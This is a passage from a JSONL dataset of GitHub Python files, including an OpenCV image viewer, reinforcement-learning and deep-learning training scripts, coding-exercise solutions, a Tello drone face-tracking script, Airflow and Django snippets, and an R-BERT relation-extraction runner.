self.inp = cv2.imread(self.param, cv2.IMREAD_COLOR)\r\n print('Reading image', self.param)\r\n\r\n def saveoutput(self, name):\r\n if self.outp is not None:\r\n print('Writing image', name)\r\n cv2.imwrite(name, self.outp)\r\n\r\n def gethist(self, im):\r\n imggray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\r\n self.histim = cv2.calcHist([imggray], [0], None, [256], [0, 256])\r\n\r\n def doprocessnone(self, img):\r\n return img\r\n\r\n def doprocessedges(self, img):\r\n imggray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n kernel = np.ones((3, 3), np.uint8)\r\n imgop = cv2.morphologyEx(imggray, cv2.MORPH_OPEN, kernel)\r\n imgdx = cv2.Sobel(imgop, cv2.CV_32F, 1, 0, ksize=3)\r\n imgdy = cv2.Sobel(imgop, cv2.CV_32F, 0, 1, ksize=3)\r\n imgsob32f = cv2.add(np.square(imgdx), np.square(imgdy))\r\n imgsob = np.uint8(np.sqrt(imgsob32f))\r\n ret, imgthr = cv2.threshold(imgsob, 0, 255,\r\n cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n return cv2.cvtColor(imgthr, cv2.COLOR_GRAY2BGR)\r\n\r\n def doprocesssmooth(self, img):\r\n return cv2.blur(img, (3, 3))\r\n\r\n def doprocessfrequency(self, img):\r\n imggray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n imgfreq = np.fft.fft2(imggray)\r\n imgfreq = np.fft.fftshift(imgfreq)\r\n imgabs = np.absolute(imgfreq)\r\n imglog = np.log(imgabs)\r\n imgones = np.ones_like(imglog)\r\n imgres = np.uint8(\r\n (imglog-imgones*imglog.min())*255/(imglog.max()-imglog.min()))\r\n return cv2.cvtColor(imgres, cv2.COLOR_GRAY2BGR)\r\n\r\n def applyfilter(self, img=None):\r\n filterdict = {'None': self.doprocessnone,\r\n 'Edges': self.doprocessedges,\r\n 'Smooth': self.doprocesssmooth,\r\n 'Freq': self.doprocessfrequency\r\n }\r\n if self.filter is None:\r\n self.filter = 'None'\r\n if img is None:\r\n return filterdict[self.filter](self.inp)\r\n else:\r\n return filterdict[self.filter](img)\r\n\r\n def showoutput(self):\r\n self.outp = self.applyfilter()\r\n pixmap = None\r\n \r\n if self.outp is not None:\r\n pixmap = self.createfromBGRimage(self.outp)\r\n self.gethist(self.outp)\r\n return pixmap\r\n \r\n def showinput(self):\r\n if self.inp is None:\r\n self.getinput()\r\n pixmap = self.createfromBGRimage(self.inp)\r\n self.gethist(self.inp)\r\n return pixmap\r\n\r\n def createfromBGRimage(self, image):\r\n imrgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n qim = QtGui.QImage(imrgb.data, imrgb.shape[1], imrgb.shape[0],\r\n QtGui.QImage.Format_RGB888)\r\n return QtGui.QPixmap(qim)\r\n\r\n def createfromgrayimage(self, image):\r\n imrgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\r\n qim = QtGui.QImage(imrgb.data, imrgb.shape[1], imrgb.shape[0],\r\n QtGui.QImage.Format_RGB888)\r\n return QtGui.QPixmap(qim)\r\n\r\n def close(self):\r\n plt.close('all')\r\n\r\n\r\nclass SacApp(QtWidgets.QApplication):\r\n \"\"\"\r\n Main Qt application\r\n \"\"\"\r\n\r\n def __init__(self, param):\r\n super(SacApp, self).__init__(param)\r\n\r\ndef main():\r\n app = SacApp(sys.argv)\r\n win = SacWindow()\r\n win.show()\r\n\r\n ret = app.exec_()\r\n return ret\r\n \r\nif __name__ == '__main__':\r\n print('Sacvision 0.0.1: (c) 2017-2022 Luis Díaz Saco')\r\n sys.exit(main())\r\n","repo_name":"luisdsaco/sacvision","sub_path":"src/sacvision/sacvisionapp.py","file_name":"sacvisionapp.py","file_ext":"py","file_size_in_byte":23471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18178801233","text":"from tf_based.bic import BICModel\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', default='../notebooks/output/50-context-500000-data-18-questions/485000/model/5dim/', type=str)\n parser.add_argument('--data', default='../notebooks/output/50-context-500000-data-18-questions/485000/scope_full.csv', type=str)\n args = parser.parse_args()\n\n model = BICModel(args.model, args.data)\n result = - model.log_likelihood()\n print('Minus log likelihood: ', result)\n","repo_name":"truythu169/snml-skip-gram","sub_path":"tf_based/bic/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74481544871","text":"'''\nauthor : Shreya Pawaskar\nlink : https://practice.geeksforgeeks.org/problems/-rearrange-array-alternately-1587115620/1\n'''\n\nt=int(input())\nfor it in range(0,t):\n n=int(input())\n l=input().split()\n for i in range(0,len(l)):\n l[i]=int(l[i])\n \n l1=[]#o(1)\n \n for i in range(0,(len(l)//2)):\n l1.append(l[len(l)-1-i])\n l1.append(l[i])\n \n if len(l)%2!=0:#odd length\n l1.append(l[(len(l)//2)])\n \n for j in range(0,len(l1)):#printing\n print(l1[j],end=\" \")\n print(\" \")\n \n ","repo_name":"errorinc0de/Coding-Questions","sub_path":"GeeksforGeeks/Rearrange Array Alternately/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"14341780034","text":"# Definition for a binary tree node.\n# 783. 二叉搜索树节点最小距离\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nimport sys\nclass Solution:\n def minDiffInBST(self, root: TreeNode) -> int:\n if root is None:\n return 0\n pre_node = None\n min_val = sys.maxsize\n min_val, pre_node = self.getMin(root, pre_node, min_val)\n return min_val\n\n\n def getMin(self, root, pre_node, min_val):\n if root is None:\n return min_val, pre_node\n min_val, pre_node = self.getMin(root.left, pre_node, min_val)\n if pre_node is not None:\n min_val = min(root.val - pre_node.val, min_val)\n pre_node = root\n min_val, pre_node = self.getMin(root.right, pre_node, min_val)\n return min_val, pre_node\n\n","repo_name":"yuyaxiong/interveiw_algorithm","sub_path":"LeetCode/二叉搜索树/783.py","file_name":"783.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2286396998","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as funct\n\nfrom live_graph import Live_graph\nimport multiprocessing as mp\n\n\nfrom agent import Agent\nfrom icm_model import Icm\n\nimport gym\nimport numpy as np\n\n\nimport time\n\ngame=gym.make('Acrobot-v1')\n\ninput_size=game.observation_space.shape[0]\noutput_size=game.action_space.n\ngamma=.9\nepsilon=.1\n\nagent=Agent(input_size,200,output_size,20,epsilon,gamma)\nicm=Icm(input_size,200,output_size,gamma,.1)\n\n\n\n# lgraph=Live_graph()\n# lgraph.add_new_object('icm_model')\n\n\naction_skips=2\n\n\npast_rewards=[]\npast_size=20\n\n\nwhile True:\n state=np.array(game.reset())\n total_rewards=0\n \n for i in range(10000):\n\n game.render()\n action,dex=agent.get_action(state)\n\n new_state,reward,done,_ = game.step(dex)\n \n intrinsic_reward=icm.get_intrinsic_reward(state,action,new_state)\n \n total_rewards+=reward\n \n reward=reward+intrinsic_reward.item()\n \n \n \n \n\n # time.sleep(.05)\n\n\n if done or i == 500:\n # lgraph.add_new_info(['icm_model'],[reward])\n # total_rewards-=5\n\n # reward=-1\n\n agent.n_games+=1\n\n\n agent.remember(state,action,reward,new_state,done)\n agent.train_short_memory(state,action,reward,new_state,done)\n \n icm.remember(state,action,new_state)\n icm.train_models(state,action,new_state)\n\n past_rewards.append(total_rewards)\n if len(past_rewards)>past_size:\n past_rewards.pop(0)\n\n print('*'*50)\n print(agent.get_ratios(),'- game#: ',agent.n_games, '- total reward: ',total_rewards)\n print('average ',round(sum(past_rewards)/len(past_rewards),4),'-','reward: ',reward)\n print('chosen: ',dex,'- actions: ',[i.item() for i in action])\n print('*'*50)\n\n agent.reset_ratios()\n break\n\n else:\n\n if i%action_skips==0:\n agent.remember(state,action,reward,new_state,done)\n agent.train_short_memory(state,action,reward,new_state,done)\n \n icm.remember(state,action,new_state)\n icm.train_models(state,action,new_state)\n \n \n\n state=new_state\n\n agent.train_long_memory()\n # icm.train_long_memory()\n\n if agent.n_games>=10000:\n break\n\n\n\n\ngame.close() \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"syntax-co/Acrobat_trainer_OpenAI","sub_path":"Acrobot.py","file_name":"Acrobot.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43070595279","text":"import argparse\nimport os\nimport os\nimport shutil\nfrom runners.utils import make_dir\nfrom evaluation.LPIPS import calc_LPIPS, find_max_min_LPIPS\nfrom evaluation.diversity import calc_diversity\n\n\ndef rename_sample_files(source_dir: str, target_dir: str):\n flist = os.listdir(source_dir)\n flist.sort()\n make_dir(target_dir)\n\n total = len(flist)\n for i in range(total):\n if i % 1000 == 0:\n print(f\"{i} samples\")\n fpath = os.path.join(source_dir, flist[i])\n if os.path.isdir(fpath):\n shutil.copytree(os.path.join(source_dir, flist[i]),\n os.path.join(target_dir, str(i)))\n elif os.path.isfile(fpath):\n shutil.copy(os.path.join(source_dir, flist[i]),\n os.path.join(target_dir, f\"{str(i)}.png\"))\n else:\n raise NotImplementedError\n\n\ndef copy_sample_files(source_dir: str, target_dir: str):\n flist = os.listdir(source_dir)\n flist.sort()\n make_dir(target_dir)\n\n total = len(flist)\n for i in range(total):\n if i % 1000 == 0:\n print(f\"{i} samples\")\n shutil.copy(os.path.join(source_dir, flist[i], 'output_0.png'),\n os.path.join(target_dir, f'{flist[i]}.png'))\n\n\ndef parse_args_and_config():\n parser = argparse.ArgumentParser(description=globals()['__doc__'])\n parser.add_argument('-f', '--func_name', type=str, default=None, help='Path to the config file')\n parser.add_argument('-r', '--root_dir', type=str, default=None, help='Path to the config file')\n parser.add_argument('-s', '--source_dir', type=str, default=None, help='Path to the source directory')\n parser.add_argument('-t', '--target_dir', type=str, default=None, help='Path to the target directory')\n parser.add_argument('-n', '--num_samples', type=int, default=1, help='Path to the destination directory')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args_and_config()\n if args.func_name == \"rename_samples\":\n source_dir = os.path.join(args.root_dir, args.source_dir)\n target_dir = os.path.join(args.root_dir, args.target_dir)\n print(f\"copy sample files from {source_dir} to {target_dir}\")\n rename_sample_files(source_dir=source_dir, target_dir=target_dir)\n elif args.func_name == \"copy_samples\":\n source_dir = os.path.join(args.root_dir, args.source_dir)\n target_dir = os.path.join(args.root_dir, args.target_dir)\n print(f\"rename sample files from {source_dir} to {target_dir}\")\n copy_sample_files(source_dir=source_dir, target_dir=target_dir)\n elif args.func_name == \"LPIPS\":\n print(f\"calculate LPIPS {args.source_dir}\")\n calc_LPIPS(data_dir=args.source_dir, gt_dir=args.target_dir, num_samples=args.num_samples)\n elif args.func_name == \"max_min_LPIPS\":\n print(f\"calculate max_min_LPIPS {args.source_dir}\")\n find_max_min_LPIPS(data_dir=args.source_dir, gt_dir=args.target_dir, num_samples=args.num_samples)\n elif args.func_name == \"diversity\":\n print(f\"calculate diversity {args.source_dir}\")\n calc_diversity(data_dir=args.source_dir, num_samples=args.num_samples)\n else:\n raise NotImplementedError\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xuekt98/BBDM","sub_path":"preprocess_and_evaluation.py","file_name":"preprocess_and_evaluation.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"72"} +{"seq_id":"4080893308","text":"import pendulum\n\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator\n\n# from my_company.common_package.common_module import cm_var\n# from my_company.common_package.subpackage.subpackaged_util_module import spum_var\n# from my_company.my_custom_dags.base_dag import my_base_function\n\n\ndef my_function():\n print(\"my_company.my_custom_dags.my_dag1.my_function\")\n\n\nwith DAG(\n dag_id='my_company.my_custom_dags.my_dag1.dag',\n default_args={\n 'owner': 'csprl',\n 'depends_on_past': False,\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 0,\n },\n description='A simple tutorial DAG',\n schedule_interval=None,\n start_date=pendulum.datetime(2022, 3, 1),\n catchup=False,\n tags=['troubleshooting', 'imports'],\n) as dag:\n t1 = PythonOperator(\n task_id='my_dag1.t1',\n python_callable=my_function,\n dag=dag\n )\n\n t1\n","repo_name":"csprl-nowigence/airflow_exploration","sub_path":"my_company/my_custom_dags/my_dag1.py","file_name":"my_dag1.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26936994790","text":"from django.urls import path\nfrom app_cad_usuarios import views\n\nurlpatterns = [\n # Rota para a página inicial\n path('', views.home, name='home'),\n\n # Rota para a página \"maconha\"\n path('juju/', views.juju, name='juju'), \n # http://127.0.0.1:8000/juju/\n \n #R Rota of users\n path('usuarios/', views.usuarios, name='listagem_usuarios'),\n \n]\n","repo_name":"DevBrunoo/wiki-HBS","sub_path":"projecttst/projeto_cad_usuarios/projeto_cad_usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14035937798","text":"from typing import Tuple\nimport torch\nfrom torch import nn\n\n\ndef make_resnet(\n in_channels,\n num_layers,\n activation,\n kernel_size,\n max_num_channels=512,\n dropout=0.0,\n stride=1,\n min_exponent=4, # number of conv filters increases exponentially from a layer to the next\n):\n out_exponent = min_exponent + 1\n layers = [\n nn.Conv2d(\n in_channels,\n 2 ** min_exponent,\n kernel_size=kernel_size,\n padding=kernel_size // 2,\n stride=stride,\n ),\n nn.BatchNorm2d(2 ** min_exponent),\n nn.Dropout(dropout),\n activation,\n ]\n layers += [\n # starts from in_channels = 32, out_channels = 64 and grows exponentially\n # with num_layers = 3 it goes to 256 channels\n resnet_block(\n min(max_num_channels, 2 ** (min_exponent + i)),\n min(max_num_channels, 2 ** (out_exponent + i)),\n kernel_size=kernel_size,\n activation=activation,\n dropout=dropout,\n stride=stride,\n )\n for i in range(num_layers)\n ]\n out_channels = min(max_num_channels, 2 ** (out_exponent + num_layers - 1))\n return nn.Sequential(*layers), out_channels\n\n\ndef mlp_block(in_size, out_size, activation, dropout=0.0):\n return nn.Sequential(\n nn.Linear(in_size, out_size),\n nn.BatchNorm1d(out_size),\n nn.Dropout(dropout),\n activation,\n )\n\n\ndef make_mlp(in_size, out_size, hidden_sizes, activation, dropout=0.0):\n if len(hidden_sizes) == 0:\n return mlp_block(in_size, out_size, dropout=dropout, activation=activation)\n\n layers = []\n for i, hidden_size in enumerate(hidden_sizes + [out_size]):\n # if last iteration,\n # append output layer and quit\n if i == len(hidden_sizes):\n layers.append(nn.Linear(in_size, hidden_size))\n break # might have been continue as well, it is the last iteration for sure\n layers.append(\n mlp_block(in_size, hidden_size, dropout=dropout, activation=activation)\n )\n in_size = hidden_size\n\n return nn.Sequential(*layers)\n\n\ndef resnet_block(\n in_channels, out_channels, activation, kernel_size, dropout=0.0, stride=1\n):\n \"\"\"1 residual convolution + 1 regular convolution + max pooling\n results in output width and height shrank by a factor of 2\n \"\"\"\n return nn.Sequential(\n ResidualBlock(\n in_channels, kernel_size=kernel_size, activation=activation, dropout=dropout\n ),\n bottleneck_block(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n activation=activation,\n dropout=dropout,\n stride=stride,\n ),\n )\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, channels, kernel_size, activation=nn.Identity(), dropout=0.0):\n super().__init__()\n self.model = nn.Sequential(\n nn.Conv2d(\n channels,\n channels,\n kernel_size=kernel_size,\n padding=kernel_size // 2,\n ),\n nn.BatchNorm2d(channels),\n nn.Dropout(dropout),\n activation,\n )\n\n def forward(self, x):\n return x + self.model(x)\n\n\ndef bottleneck_block(\n in_channels, out_channels, activation, kernel_size=3, dropout=0.0, stride=1\n):\n return nn.Sequential(\n nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n padding=kernel_size // 2,\n stride=stride,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout),\n activation,\n nn.MaxPool2d(2),\n )\n","repo_name":"MaxPappa/IrisSegmentation","sub_path":"neural/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13821428945","text":"import cv2\r\nfrom djitellopy import tello\r\nimport time\r\nimport numpy as np\r\nimport mediapipe as mp\r\nmp_face_detection = mp.solutions.face_detection\r\n\r\n\r\nme = tello.Tello()\r\nme.connect()\r\nprint(\"connecting to veronica\")\r\nprint(f\"current battery status -: {me.get_battery()}\")\r\nme.streamon()\r\nme.takeoff()\r\nme.send_rc_control(0, 0, 20, 0)\r\ntime.sleep(.8)\r\n\r\np_time = 0\r\nw, h = 360, 240\r\nfbRange = [6200, 6800]\r\npid = [0.4, 0.4, 0]\r\np_error = 0\r\n\r\ndef detect_face(image):\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = face_detection.process(image)\r\n\r\n # Draw face detections of each face.\r\n\r\n faces = []\r\n img_x, img_y, _ = image.shape\r\n\r\n if results.detections:\r\n for detection in results.detections:\r\n x = int(detection.location_data.relative_bounding_box.xmin * img_y)\r\n y = int(detection.location_data.relative_bounding_box.ymin * img_x)\r\n w = int(detection.location_data.relative_bounding_box.width * img_y)\r\n h = int(detection.location_data.relative_bounding_box.height * img_x)\r\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n faces.append((x, y, w, h))\r\n return faces\r\n\r\n\r\ndef find_face(frame):\r\n faces = detect_face(frame)\r\n my_face_list_c = []\r\n my_face_list_area = []\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n c_x = x + w // 2\r\n c_y = y + h // 2\r\n cv2.circle(frame, (c_x, c_y), 2, (0, 255, 0), cv2.FILLED)\r\n my_face_list_c.append([c_x, c_y])\r\n my_face_list_area.append(w * h)\r\n if len(my_face_list_area) != 0:\r\n arg_max = my_face_list_area.index(max(my_face_list_area))\r\n return frame, [my_face_list_c[arg_max], my_face_list_area[arg_max]]\r\n else:\r\n return frame, [[0, 0], 0]\r\n\r\n\r\ndef track_face(info, w, pid, p_error):\r\n area = info[1]\r\n x, y = info[0]\r\n fb = 0\r\n error = x - w // 2\r\n speed = pid[0] * error + pid[1] * (error - p_error)\r\n speed = int(np.clip(speed, -100, 100))\r\n if area > fbRange[0] and area < fbRange[1]:\r\n fb = 0\r\n elif area > fbRange[1]:\r\n fb = -20\r\n\r\n elif area < fbRange[0] and area != 0:\r\n fb = 20\r\n\r\n if x == 0:\r\n speed = 0\r\n error = 0\r\n\r\n me.send_rc_control(0, fb, 0, speed)\r\n # print(speed,fb)\r\n return error\r\n\r\n\r\nwhile True:\r\n\r\n with mp_face_detection.FaceDetection(model_selection=0, min_detection_confidence=0.5) as face_detection:\r\n frame = me.get_frame_read().frame\r\n frame = cv2.resize(frame, (w, h))\r\n\r\n frame, data = find_face(frame)\r\n p_error = track_face(data, w, pid, p_error)\r\n ctime = time.time()\r\n fps = 1 / (ctime - p_time)\r\n p_time = ctime\r\n cv2.putText(frame, str(int(fps)), (50, 100), cv2.FONT_HERSHEY_PLAIN, 5,\r\n (255, 0, 0), 5)\r\n # print(\"Area\",data[1])\r\n\r\n cv2.imshow(\"video\", frame)\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n me.land()\r\n break","repo_name":"atulyaatul1999/Veronica--Fully-AI-automated-drone","sub_path":"mediapipe face tracking.py","file_name":"mediapipe face tracking.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39802613712","text":"import pandas as pd\nimport selenium\n\n\n# with open('newfile.csv', 'r') as newfile:\n# base = newfile.re\npd.set_option('display.expand_frame_repr', False)\nbase = pd.read_csv('newfile.csv', sep=';') # base of popular words\nbase2 = pd.read_csv('unigram_freq.csv') # base of popular score\nbase2['id'] = range(1, len(base2) + 1)\nbase_final = base2.merge(base, left_on='word', right_on='eng', how='left').fillna('')\nbase_final = base_final.loc[base_final['eng'] != '']\nbase_transcription = pd.read_csv('pars_result.csv', sep=';') # base of parsed words\nbase_final = base_final.merge(base_transcription, left_on='eng', right_on='eng', how='left').fillna('')\n\nbase_final['rus'] = [base_final['rus_y'][i] if base_final['rus_y'][i] != '' else base_final['rus_x'][i] for i in range(len(base_final))]\n#base_final = base_final.set_index('id')\n\nnew_words2 = pd.read_csv('new_words2.csv')\nid_col = [i + 1 for i in range(len(new_words2))]\nnew_words2['new_id'] = id_col\nnew_words2['eng'] = new_words2['eng'].str.lower()\n\nbase_final = base_final.merge(new_words2, left_on='eng', right_on='eng', how='left')\nprint(base_final)\n\nTXT = 'hang out'\n\nwords = TXT.split(', ') if ',' in TXT else TXT.split(' ')\nprint(words)\nbase_final['id'] = base_final['id'].astype(str)\nbase_final['new_id'] = base_final['new_id'].astype(str)\n\nword_to_line = base_final.loc[base_final['eng'].isin(words), ['id', 'new_id', 'eng', 'transcription', 'rus']]\nword_to_line['len_eng'] = word_to_line['eng'].str.len()\nword_to_line = word_to_line.sort_values(by='len_eng', ascending=False)\nword_to_line = word_to_line.drop(columns=['len_eng'])\nprint(word_to_line, '\\n')\n\nfor word in word_to_line['eng']:\n TXT = TXT.replace(word, word_to_line.loc[word_to_line['eng'] == word, ['transcription']].iloc[0, 0][1:-1])\n# print('----------------', word_to_line.loc[word_to_line['eng'] == 'heap', ['transcription']].iloc[0, 0])\nTXT = '[' + TXT + ']'\nprint('----------', TXT)\nfor i in word_to_line.values:\n new_line = ';'.join(i)\n print(f'{new_line};0;0;')\n\nprint(pd.read_csv('my_dict.csv', sep=';')['id'].max())\n\n\n\n","repo_name":"Skriaga2014/eng-bot","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15564414538","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# @Version : Python 3.6\n\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom tqdm import tqdm\nfrom transformers import AdamW\nfrom transformers import get_linear_schedule_with_warmup\nfrom transformers import WEIGHTS_NAME, CONFIG_NAME\n\nfrom config import Config\nfrom utils import RelationLoader, SemEvalDataLoader\nfrom model import R_BERT\nfrom evaluate import Eval\n\n\nclass Runner(object):\n def __init__(self, id2rel, loader, user_config):\n self.class_num = len(id2rel)\n self.id2rel = id2rel\n self.loader = loader\n self.user_config = user_config\n\n self.model = R_BERT(self.class_num, user_config)\n self.model = self.model.to(user_config.device)\n self.eval_tool = Eval(user_config)\n\n def train(self):\n train_loader, dev_loader, _ = self.loader\n num_training_steps = len(train_loader) // self.user_config.\\\n gradient_accumulation_steps * self.user_config.epoch\n num_warmup_steps = int(num_training_steps *\n self.user_config.warmup_proportion)\n\n bert_params = list(map(id, self.model.bert.parameters()))\n rest_params = filter(lambda p: id(\n p) not in bert_params, self.model.parameters())\n\n optimizer_grouped_parameters = [\n {'params': self.model.bert.parameters()},\n {'params': rest_params, 'lr': self.user_config.other_lr},\n ]\n optimizer = AdamW(\n optimizer_grouped_parameters,\n lr=self.user_config.lr,\n eps=self.user_config.adam_epsilon\n )\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=num_warmup_steps,\n num_training_steps=num_training_steps,\n )\n print('--------------------------------------')\n print('traning model parameters (except PLM layers):')\n for name, param in self.model.named_parameters():\n if id(param) in bert_params:\n continue\n if param.requires_grad:\n print('%s : %s' % (name, str(param.data.shape)))\n\n print('--------------------------------------')\n print('start to train the model ...')\n\n max_f1 = -float('inf')\n for epoch in range(1, 1+self.user_config.epoch):\n train_loss = 0.0\n data_iterator = tqdm(train_loader, desc='Train')\n for _, (data, label) in enumerate(data_iterator):\n self.model.train()\n data = data.to(self.user_config.device)\n label = label.to(self.user_config.device)\n\n optimizer.zero_grad()\n loss, _ = self.model(data, label)\n train_loss += loss.item()\n loss.backward()\n\n nn.utils.clip_grad_norm_(\n self.model.parameters(),\n max_norm=self.user_config.max_grad_norm\n )\n optimizer.step()\n scheduler.step()\n\n train_loss = train_loss / len(train_loader)\n\n f1, dev_loss, _ = self.eval_tool.evaluate(self.model, dev_loader)\n print('[%03d] train_loss: %.3f | dev_loss: %.3f | micro f1 on dev: %.4f'\n % (epoch, train_loss, dev_loss, f1), end=' ')\n if f1 > max_f1:\n max_f1 = f1\n model_to_save = self.model.module if hasattr(\n self.model, 'module') else self.model\n output_model_file = os.path.join(\n self.user_config.model_dir, WEIGHTS_NAME)\n output_config_file = os.path.join(\n self.user_config.model_dir, CONFIG_NAME)\n torch.save(model_to_save.state_dict(), output_model_file)\n model_to_save.bert.config.to_json_file(output_config_file)\n print('>>> save models!')\n else:\n print()\n\n def test(self):\n print('--------------------------------------')\n print('start load model ...')\n if not os.path.exists(self.user_config.model_dir):\n raise Exception('no pre-trained model exists!')\n\n state_dict = torch.load(\n os.path.join(self.user_config.model_dir, WEIGHTS_NAME),\n map_location=self.user_config.device\n )\n self.model.load_state_dict(state_dict)\n\n print('--------------------------------------')\n print('start test ...')\n _, _, test_loader = self.loader\n f1, test_loss, predict_label = self.eval_tool.evaluate(self.model, test_loader)\n print('test_loss: %.3f | micro f1 on test: %.4f' % (test_loss, f1))\n return predict_label\n\n\ndef print_result(predict_label, id2rel, start_idx=8001):\n des_file = './eval/predicted_result.txt'\n with open(des_file, 'w', encoding='utf-8') as fw:\n for i in range(0, predict_label.shape[0]):\n fw.write('{}\\t{}\\n'.format(\n start_idx+i, id2rel[int(predict_label[i])]))\n\n\nif __name__ == '__main__':\n user_config = Config()\n print('--------------------------------------')\n print('some config:')\n user_config.print_config()\n\n print('--------------------------------------')\n print('start to load data ...')\n rel2id, id2rel, class_num = RelationLoader(user_config).get_relation()\n loader = SemEvalDataLoader(rel2id, user_config)\n\n train_loader, dev_loader, test_loader = None, None, None\n if user_config.mode == 0: # train mode\n train_loader = loader.get_train()\n dev_loader = loader.get_dev()\n test_loader = loader.get_test()\n elif user_config.mode == 1:\n test_loader = loader.get_test()\n loader = [train_loader, dev_loader, test_loader]\n print('finish!')\n\n runner = Runner(id2rel, loader, user_config)\n if user_config.mode == 0: # train mode\n runner.train()\n predict_label = runner.test()\n elif user_config.mode == 1:\n predict_label = runner.test()\n else:\n raise ValueError('invalid train mode!')\n print_result(predict_label, id2rel)\n","repo_name":"onehaitao/R-BERT-relation-extraction","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"6176260644","text":"from services.gsheets_api import get_list\nfrom services.opencage_api import Geocode\n\nGSHEETS_ID = ''\nGSHEETS_RANGE = ''\n\ndef get_cities_list(id, range):\n \"\"\"Gets a list of cities from a google sheets.\"\"\"\n return get_list(id, range)\n\ndef get_coordinates(city_list):\n \"\"\"Gets the coordinates of a city.\"\"\"\n geo = Geocode()\n results = {}\n for city in city_list:\n coordinates = geo.get_coordinates(city)\n results[city] = str(coordinates['results'][0]['geometry']['lat']) + \\\n ', ' + str(coordinates['results'][0]['geometry']['lng'])\n return results\n\ndef main():\n \"\"\"Main Entry Point.\"\"\"\n city_list = get_cities_list(GSHEETS_ID, GSHEETS_RANGE)\n city_coordinates = get_coordinates(city_list)\n for city, coordinates in city_coordinates.items():\n print(city, ': ', coordinates)\n\nif __name__ == '__main__':\n main()","repo_name":"marcelodof/gsheets-cities-coordinates","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21233638047","text":"from django.conf import settings\nfrom django.db.models import Q\nfrom rest_framework import generics\nfrom rest_framework import permissions\nfrom .serializers import BookingSerializer, BookingAdminSerializer, BookingPriceAdminSerializer\nfrom phookit.bookingcalendar.models import Booking, BookingPrice\n\n\n# TODO: Move into permissions.py\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n \"\"\"\n Custom permission to only allow owners of an object to edit it.\n \"\"\"\n def has_object_permission(self, request, view, obj):\n # Read permissions are allowed to any request,\n # so we'll always allow GET, HEAD or OPTIONS requests.\n if request.method in permissions.SAFE_METHODS:\n return True\n # Write permissions are only allowed to the owner of the snippet.\n ### return obj.owner == request.user\n return obj.is_editable(request)\n\nclass IsAdminOrReadOnly(permissions.BasePermission):\n \"\"\"\n Custom permission to only allow admins to edit.\n \"\"\"\n def has_object_permission(self, request, view, obj):\n # Read permissions are allowed to any request,\n # so we'll always allow GET, HEAD or OPTIONS requests.\n if request.method in permissions.SAFE_METHODS:\n return True\n # Write permissions are only allowed to admins\n return request.user.is_staff\n\n\nclass BookingList(generics.ListCreateAPIView):\n '''\n Only admins can create new calendar items\n '''\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,\n IsAdminOrReadOnly,)\n serializer_class = BookingSerializer\n\n\n def get_queryset(self):\n \"\"\"\n \"\"\"\n queryset = Booking.objects.all()\n start = 